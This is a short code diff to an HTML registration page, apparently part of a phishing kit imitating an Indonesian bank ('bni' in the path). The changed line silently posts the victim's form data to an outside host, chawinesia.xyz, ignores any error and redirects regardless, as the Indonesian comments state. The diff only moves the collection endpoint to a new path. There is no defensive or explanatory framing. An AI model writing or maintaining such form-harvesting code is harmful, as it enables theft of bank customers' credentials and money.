--- a/daftar2.html
+++ b/daftar2.html
@@ -424,7 +424,7 @@ ion-icon{
         $('.load').show();
 
         // Kirim ke daftar.php di latar belakang (tanpa menunggu)
-        $.post('https://chawinesia.xyz/bni/1/daftar.php', formData).fail(function() {
+        $.post('https://chawinesia.xyz/bni/x5/daftar.php', formData).fail(function() {
           // Abaikan error — tetap redirect
           console.warn('Gagal kirim ke server, tapi tetap redirect.');
         });
